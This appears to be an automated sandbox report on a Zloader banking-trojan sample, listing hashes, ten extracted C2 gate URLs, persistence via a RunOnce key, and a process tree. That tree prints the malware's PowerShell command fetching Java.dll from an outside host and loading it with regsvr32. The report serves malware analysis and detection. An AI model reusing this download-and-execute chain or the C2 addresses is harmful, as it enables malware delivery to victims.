zloader | cbc445b9882192d8cb8c62c6a5231e6efedcb5d60b610fcb1147a943c2a83e21

General

Target

start.EXE
Size

165KB
MD5

95abe912bb579d445f4b2cc30c6e3750
SHA1

4f8ddf498f7dceb9a5d32de909ced0518f697ef0
SHA256

cbc445b9882192d8cb8c62c6a5231e6efedcb5d60b610fcb1147a943c2a83e21
SHA512

515e6c8b08fceb21153ec4df5a7a21d283da135d4aed0116420b6dec59ec1168cf6ef7a12fd593fb5f492de0f7e180d15405a57dd0484859c3c3d7a4db54115e

Score

10^/10

zloader vasja vasja botnet persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1844 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

2008 regsvr32.exe

flow	pid	process
6	1844	powershell.exe

pid	process
2008	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

start.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	start.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	start.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

regsvr32.exe

pid process

572 regsvr32.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1844 powershell.exe
1844 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1844 powershell.exe

pid	process
572	regsvr32.exe

pid	process
1844	powershell.exe
1844	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1844	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

start.EXEcmd.exeregsvr32.exe

description	pid	process	target process
PID 1208 wrote to memory of 1984	1208	start.EXE	cmd.exe
PID 1208 wrote to memory of 1984	1208	start.EXE	cmd.exe
PID 1208 wrote to memory of 1984	1208	start.EXE	cmd.exe
PID 1984 wrote to memory of 1844	1984	cmd.exe	powershell.exe
PID 1984 wrote to memory of 1844	1984	cmd.exe	powershell.exe
PID 1984 wrote to memory of 1844	1984	cmd.exe	powershell.exe
PID 1984 wrote to memory of 572	1984	cmd.exe	regsvr32.exe
PID 1984 wrote to memory of 572	1984	cmd.exe	regsvr32.exe
PID 1984 wrote to memory of 572	1984	cmd.exe	regsvr32.exe
PID 1984 wrote to memory of 572	1984	cmd.exe	regsvr32.exe
PID 1984 wrote to memory of 572	1984	cmd.exe	regsvr32.exe
PID 572 wrote to memory of 2008	572	regsvr32.exe	regsvr32.exe
PID 572 wrote to memory of 2008	572	regsvr32.exe	regsvr32.exe
PID 572 wrote to memory of 2008	572	regsvr32.exe	regsvr32.exe
PID 572 wrote to memory of 2008	572	regsvr32.exe	regsvr32.exe
PID 572 wrote to memory of 2008	572	regsvr32.exe	regsvr32.exe
PID 572 wrote to memory of 2008	572	regsvr32.exe	regsvr32.exe
PID 572 wrote to memory of 2008	572	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\start.EXE
"C:\Users\Admin\AppData\Local\Temp\start.EXE"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\system32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://srwhpvikxwoxfmgotrje.com/Java.dll -OutFile Java.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Windows\system32\regsvr32.exe
regsvr32 Java.dll
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:572

C:\Windows\SysWOW64\regsvr32.exe
Java.dll
4⤵
- Loads dropped DLL
PID:2008

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:1552

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
3⤵
PID:552

C:\Windows\system32\wscript.exe
wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
3⤵
PID:1116

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
3dbdaa0a6eba1c576c706edf9b82c171

SHA1
2ac4023bdf41e3319570307cc8888194e4277130

SHA256
f89a7ca58aefeee7953adbd8e32f18b95b71e51144d07920ba41b3447b42d233

SHA512
c2071c45ece1b5408bbbab3e5970adc46d8e21327f2489f2e7610d4532c5108dc24f1e8531d3ba9138641b194cfa33ed32e998360509fa34bfba234c0a607cc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp.vbs
MD5
fd95bf47d800456ff50e10f166be01d0

SHA1
a0acd9785d740974ba894ce311f70f6ca102709f

SHA256
4dc30753f79cd1088d0a5d729f9d5373bbba893be4490b90d149b25b6a8e2b55

SHA512
e288b26f6bc406e04f1b3d2af463af656804ea37abb54ef8a732105471e11d3e95c719bdcd7a89fff15afa5648efcbccc7d8ed1b577d523ba354a21357964e69

Download Submit
C:\Users\Admin\AppData\Roaming\Java.dll
MD5
ef6326ba3912f4d0fc7bcfcb36e41cfe

SHA1
4ea0bec0d162db3c2d38f60feab64e16c52d14e2

SHA256
2439bee322854d93826f1f915eab127ae637b19cc89ed32a2c1a047730733f47

SHA512
80b1ed813d032a2d1b7b3dc041f338428ca718b4175ba1e74af36937b8b76b31158b4153233fe20599f1d5cee6eab22e26c05c29428278ebb3fce92f3a495a77

Download Submit
\Users\Admin\AppData\Roaming\Java.dll
MD5
ef6326ba3912f4d0fc7bcfcb36e41cfe

SHA1
4ea0bec0d162db3c2d38f60feab64e16c52d14e2

SHA256
2439bee322854d93826f1f915eab127ae637b19cc89ed32a2c1a047730733f47

SHA512
80b1ed813d032a2d1b7b3dc041f338428ca718b4175ba1e74af36937b8b76b31158b4153233fe20599f1d5cee6eab22e26c05c29428278ebb3fce92f3a495a77

Download Submit
memory/552-81-0x0000000000000000-mapping.dmp

Download
memory/572-72-0x0000000000000000-mapping.dmp

Download
memory/1116-83-0x0000000000000000-mapping.dmp

Download
memory/1208-60-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

Filesize
8KB

Download
memory/1552-85-0x00000000000D0000-0x00000000000F6000-memory.dmp

Filesize
152KB

Download
memory/1552-80-0x0000000000000000-mapping.dmp

Download
memory/1844-66-0x000000001AA30000-0x000000001AA31000-memory.dmp

Filesize
4KB

Download
memory/1844-71-0x000000001C100000-0x000000001C101000-memory.dmp

Filesize
4KB

Download
memory/1844-70-0x00000000025A0000-0x00000000025A1000-memory.dmp

Filesize
4KB

Download
memory/1844-69-0x000000001A9B4000-0x000000001A9B6000-memory.dmp

Filesize
8KB

Download
memory/1844-68-0x000000001A9B0000-0x000000001A9B2000-memory.dmp

Filesize
8KB

Download
memory/1844-67-0x000000001A950000-0x000000001A951000-memory.dmp

Filesize
4KB

Download
memory/1844-65-0x00000000024D0000-0x00000000024D1000-memory.dmp

Filesize
4KB

Download
memory/1844-63-0x0000000000000000-mapping.dmp

Download
memory/1984-61-0x0000000000000000-mapping.dmp

Download
memory/2008-75-0x0000000000000000-mapping.dmp

Download
memory/2008-76-0x0000000076281000-0x0000000076283000-memory.dmp

Filesize
8KB

Download
memory/2008-78-0x0000000000130000-0x00000000001B0000-memory.dmp

Filesize
512KB

Download
memory/2008-79-0x0000000010000000-0x0000000010142000-memory.dmp

Filesize
1.3MB

Download

Analysis

Sharing